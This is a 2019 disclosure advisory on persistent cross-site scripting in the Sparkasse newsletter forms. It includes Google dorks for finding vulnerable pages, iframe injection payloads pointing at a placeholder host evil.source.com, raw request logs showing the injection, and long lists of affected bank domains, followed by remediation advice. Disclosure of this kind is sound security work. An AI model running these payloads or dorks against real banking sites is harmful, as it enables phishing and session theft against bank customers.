Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
vulnerlabVulnerability Laboratory [Core Research Team] - Benjamin Kunz Mejri (https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)VULNERABLE:2173
HistoryMar 07, 2019 - 12:00 a.m.

Sparkasse - Multiple Persistent Cross Site Vulnerabilities

2019-03-0700:00:00
Vulnerability Laboratory [Core Research Team] - Benjamin Kunz Mejri (https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
www.vulnerability-lab.com
60
JSON
Document Title:
===============
Sparkasse - Multiple Persistent Cross Site Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2173


Release Date:
=============
2019-03-07


Vulnerability Laboratory ID (VL-ID):
====================================
2173


Common Vulnerability Scoring System:
====================================
4.6


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
4.000€ - 5.000€


Product & Service Introduction:
===============================
A savings bank is a credit institution with the task of offering opportunities to broad sections of the population.
to offer financial investment, to carry out payment transactions and to meet local credit needs.
to satisfy the needs of small and medium-sized enterprises as well. 

(Copy of the Homepage: https://en.wikipedia.org/wiki/Sparkasse )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the Sparkasse online service web-application.


Vulnerability Disclosure Timeline:
==================================
2018-10-25: Researcher Notification & Coordination (Security Researcher)
2018-10-26: Vendor Notification (S-CERT Department)
2018-10-29: Vendor Response/Feedback (S-CERT Department)
2019-02-20: Vendor Fix/Patch (Service Developer Team)
2018-**-**: Security Acknowledgements (S-CERT Department)
2019-03-07: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Sparkasse
Product: Mailing Server - Online Service (Web-Application) 2018 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Open Authentication (Anonymous Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official sparkasse online service newsletter web-application. 
Local low privileged user accounts are able to inject own malicious script codes on the application-side of the vulnerable service module.

The vulnerability is located in the `firstname`, `lastname` and `companyname` values of the `newsletter` module. The vulnerable parameters 
are f[1][v], f[2][v] & f[2][v]. Remote attackers are able to inject own malicious script code via POST method request to the application-side 
of the sparkasse dns domain mailing service. The attack vector of the vulnerability is persistent on the application-side and the request 
method to inject is POST. The attacker does not need to be directly authenticated because its only an initial registration without direct 
activiation request. The injection point are the vulnerable input fields and the execution of the malform injected code takes place in the 
`mailing.sparkasse.de` or unique `*sparkasse.de` domains by a client-side GET method request.

The issue affects all pages listed with the newsletter module. Thus lead to an integration to all the different 
domains by the involved service provider. Now the vulnerability is all over in the sparkasse domains and allows email spoofing, phishing, 
cross site requests for redirect to malware or exploits and persistent manipulation of sparkasse domain (dbms) contents. Due to a crawl we 
identified a large list of affected web-applications from sparkasse by usage of different google dork methods. A targeted user can not see 
that the manipulated website is insecure because of the trusted native source that deliveres the contexts over the sparkasse mailing api.

The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system v3) count of 5.2. 
The exploitation of the persistent input validation web vulnerability requires low user inter action and no privileged application user account.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious sources 
and persistent manipulation of affected or connected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s): 
[+] Newsletter

Vulnerable Input(s): 
[+] Vorname
[+] Nachname
[+] Firmenname

Vulnerable Parameter(s): 
[+] f[1][v]
[+] f[2][v]
[+] f[3][v]

Affected Domain(s):
[+] mailing.sparkasse.de
[+] other unique domains like news.sparkasse ...


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with low privileged application user account and medium required user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Google Dorks: 
allinurl:sparkasse /de/home/service/newsletter.html
allinurl:sparkasse newsletter.html?n=true

Google Dork URL: 
https://www.google.com/search?q=allinurl:sparkasse+/de/home/service/newsletter.html
https://www.google.com/search?q=allinurl:%3Asparkasse+newsletter.html?n?true



Payload: Phishing
test"><iframe src=http://www.evil.source.com/poc.html></iframe>

Payload: Session Hijacking
test"><iframe src=http://www.evil.source.com/ onload=alert(document.cookie)></iframe>
test"><iframe src=http://www.evil.source.com/ onload=alert(document.domain)></iframe>

Payload: Malware or Exploit
test"><iframe src=http://www.evil.source.com/poc.js></iframe>

Payload: Redirect
test"><window.frames["myFrame"].location = "http://...">



PoC: Demo URLs (Examples)
https://mailing.sparkasse.de/-viewonline2/15070/545/2055/QgsWbJ3W/rnckioVlCz/1
https://mailing.sparkasse.de/-viewonline2/6511/457/1029/961H3567/80CK9NcUj9/1
https://news.sparkasse-allgaeu.de/-viewonline2/6620/759/2129/tmBn69YJ/kU02LY1vXk/1



--- PoC Session Logs (POST) [Inject] ---
https://www.sparkasse-aachen.de/content/myif/spk-aachen/work/filiale/de/home/misc/vps/gate/_jcr_content.bin/emma/api/rest/39050000/optinsetup/5/form
Host: www.sparkasse-aachen.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://www.sparkasse-aachen.de/de/home/service/newsletter.html?n=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 324
Cookie: JSESSIONID=0000IkwJ8m_99MAwctzQGQvKqQ7:559eb1d1d; IF6CONTEXT=SVBTVEFOREFSRDozOTA1MDAwMDpkZTpJRjpmYWxzZTpzcGstYWFjaGVu; 
IFCLONE=559eb1d1d; IF_SPKDE_CHECK=SPKDE_CHECK; vpi-3117116-SPKDE16=rd901o00000000000000000000ffffac10c6c0o80; vpi-3117116-emma_session=eyJpdiI6IlZTV3o5bVNtMm5hOCthNm9cLzRvOEVnPT0iLCJ2YWx1ZSI6IjNCNTZQYnZNT2tDUkpZZTREQ01pTGtKVllLRUd0ZjQwYkhHSTExalErNm
RqMzV2QTBcL3hDc1wvSndUXC9YNk5rK0tQOEF6UGRrR2JHcEgzNCtMZVg4QitRPT0iLCJtYWMiOiIwNTdlZDUzMWU1NGUzNTBkZDkxMTE1MTk5OWRmMWI2ZDRmMmY1M
TEzMzdmM2E0MDMxZTMyZmFkMjdjZThkNTIxIn0%3D
Connection: keep-alive
f[0][i]=1&f[0][v][email protected]&f[1][i]=5&f[1][v]=a<iframe src=http://www.evil.source.com/ 
onload=alert(document.cookie)>&f[2][i]=7&f[2][v]=b<iframe src=http://www.evil.source.com/ onload=alert(document.cookie)>
&f[3][v]=<iframe src=http://www.evil.source.com/ onload=alert(document.cookie)>[i]=11&f[3][v]=1&l[]=1,5,3,9,7,37
-
POST: HTTP/1.1 200 OK
X-UA-Compatible: IE=edge
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache
Content-Length: 59
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Language: de-DE


--- PoC Session Logs (GET) [Execute] ---
https://mailing.sparkasse.de/-viewonline2/15070/545/2055/QgsWbJ3W/rnckioVlCz/1
Host: mailing.sparkasse.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: SPK_COOKIE=YmFua2NvZGU9NzY1NTAwMDA%3D; TCPID=118104211048178479492; s_fid=65EF7EF7E0BBFBFC-20A9728F3A9D422B; 
s_cc=true; TC_OPTOUT=0@@@017@@@ALL; s_sq=spfgmbhsdeprod%3D%2526c.%2526a.%2526activitymap.%2526page%253Dservice%25253
Afilialsuche%2526link%253D%2525C3%252584ndern%2526region%253Dbank%2526pageIDType%253D1%2526.activitymap%2526.a%2526.c
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset="UTF-8"
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip



PoC: Source (Email & Web Pages)
<table style="margin:0px auto; width:600px;" class="c100" width="600" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff" align="center">
<tbody><tr><td colspan="3" height="25">&nbsp;</td></tr>
<tr>
    	<td class="c5" width="25">&nbsp;</td>
        <td class="c90" width="550" valign="top">
        	<table width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff">
            	<tbody><tr>
                	<th style="font-weight: normal;" class="col" valign="top" align="left">
                    	<table width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff">
                        	<tbody><tr>
                            	<td style="font-family:Arial, Helvetica, sans-serif; font-size:12px; line-height:18px; color:#333333;" align="left">
                                	<strong>Sehr geehrte Frau b"&gt;<iframe>%20>"<iframe src=evil.source>[EXECUTION POINT!],</strong><br /><br />
                                    waren Sie bereits im Urlaub oder stehen Ihnen die schönsten Tage des Jahres noch bevor? In unserem ersten Beitrag berichten 
wir über die aktuellen Urlaubstrends der Deutschen. Die praktische App Kwitt können Sie das ganze Jahr über nutzen. Lesen Sie, wie einfach es mit dieser Anwendung 
innerhalb Ihrer App „Sparkasse“ ist, Geld von Handy zu Handy zu überweisen, und sei es, um die Rechnung vom letzten Besuch bei Ihrem Lieblingsitaliener zu teilen. 
Außerdem informieren wir Sie unter anderem darüber, wie Sie am besten vorgehen, wenn Sie im Urlaub Grund zu einer Reklamation haben. &nbsp;<br>
</td>
</tr>


Affected Domain(s):
===================
Sparkasse Domains:
https://www.sparkasse-ansbach.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-ger-kandel.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-wiehl.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-vogtland.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-allgaeu.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-iserlohn.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-wuppertal.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-offenburg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-nuernberg.de/de/home/service/Newsletter.html?n=true
https://www.sparkasse-ffb.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dachau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-freiburg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-landshut.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-emh.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-krefeld.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-passau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-moenchengladbach.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bremen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dillingen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-rhein-maas.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-adl.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-holstein.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-luedenscheid.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dueren.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-heidelberg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-hochsauerland.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-saarbruecken.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-delbrueck.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dortmund.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-rhein-maas.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-hanau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-suedwestpfalz.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-pfaffenhofen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-fuerth.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-donnersberg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-freising.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-neumarkt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-muelheim-ruhr.de/de/home/service/newsletter.html
https://www.sparkasse-suew.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-celle.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-neuss.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bielefeld.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-radevormwald.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bamberg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dieburg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-soestwerl.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-radevormwald.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-emsland.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-kehl.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-schwandorf.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-neunkirchen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-lev.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-vorderpfalz.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-hagenherdecke.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-muelheim-ruhr.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-zollernalb.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-suedwestpfalz.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-passau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-pforzheim-calw.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-wa-fkb.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-co-lif.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-elmshorn.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-ger-kandel.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-suedwestpfalz.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-amberg-sulzbach.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-lippstadt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dillingen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-olpe.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bremen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-ger-kandel.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-aachen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-finnentrop.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-heilbronn.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-saalfeld-rudolstadt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-blomberg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-darmstadt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-saalfeld-rudolstadt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bodensee.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-heilbronn.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dachau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-nuernberg.de/de/home/service/Newsletter.html?n=true
https://www.sparkasse-herford.de/de/home/immobilien/newsletter.html?n=true
https://www.sparkasse-hannover.de/de/home/ihre-sparkasse/newsletter.html?n=true
https://www.sparkasse-delbrueck.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-schwandorf.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-hagenherdecke.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-mittelfranken-sued.de/de/home/ihre-sparkasse/newsletter.html?n=true
https://www.sparkasse-lemgo.de/de/home/privatkunden/junge-leute/flexibel-durchstarten/S-Club/anmeldung-newsletter.html?n=true
https://www.sparkasse-rhein-neckar-nord.de/de/home/ihre-sparkasse/ihre-sparkasse-vor-ort/newsletter.html?n=true

Sparkasse Unique Domains:
https://www.berliner-sparkasse.de/de/home/service/newsletter.html?n=true
https://www.herner-sparkasse.de/de/home/service/newsletter.html?n=true
https://www.foerde-sparkasse.de/de/home/service/newsletter.html?n=true
https://www.rhoen-rennsteig-sparkasse.de/de/home/service/newsletter.html?n=true
https://www.ksk-walsrode.de/de/home/service/newsletter.html?n=true
https://www.ospa.de/de/home/ihre-sparkasse/newsletter.html?n=true

Sparkasse Muster Systems & Partners:
https://partner.meine-sparkasse.de/partner/69051620/58/?blz=69051620&site=
https://sparkasse-musterstadt.if-einblick.de/de/home/service/newsletter.html?n=true
https://sparkasse-musterstadt-svrp.if-einblick.de/de/home/service/newsletter.html?n=true
https://sparkasse-musterstadt-sgvht.if-einblick.de/de/home/service/newsletter.html?n=true


Solution - Fix & Patch:
=======================
1. The vulnerability can be patched by a parse and encode of the vulnerable `firstname`, `lastname` and `companyname` input fields 
in all the affected newsletter by an automated or manual update. Ask Sparkasse Kassel after the first incident they resolved the issue.

2. Restrict the affected input fields and disallow the usage of special chars to prevent malicious script code injection attacks. 

3. Escape or safe encode the name parameter content in the html generated template on the affected sparkasse mailing or unique domain page.

4. Sanitize in the outgoing emails through the sparkasse server the affected name parameters to finally resolve the vulnerability.

5. Integrate a secure process to gain knowledge of any vulnerability that is tracked and reported to banks or in the patch cycle to ensure 
that vulnerability issues cannot become major infrastructure issues overnight.

Note: The issue has been reported to the finance informatic in 2018 q4 and was forwarded to the s-cert team of the sparkasse.


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the web-application module is estimated as medium.
The vulnerability can be used to produce malicious and malformed content to phish or exploit user session data the easy way.
The targeted users can not see that the delivered contents are not from the original sparkasse source.


Credits & Authors:
==================
Vulnerability Laboratory [Core Research Team] - Benjamin Kunz Mejri (https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab 
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or 
edit our material contact (admin@ or research@) to get a ask permission.

				    Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™
JSON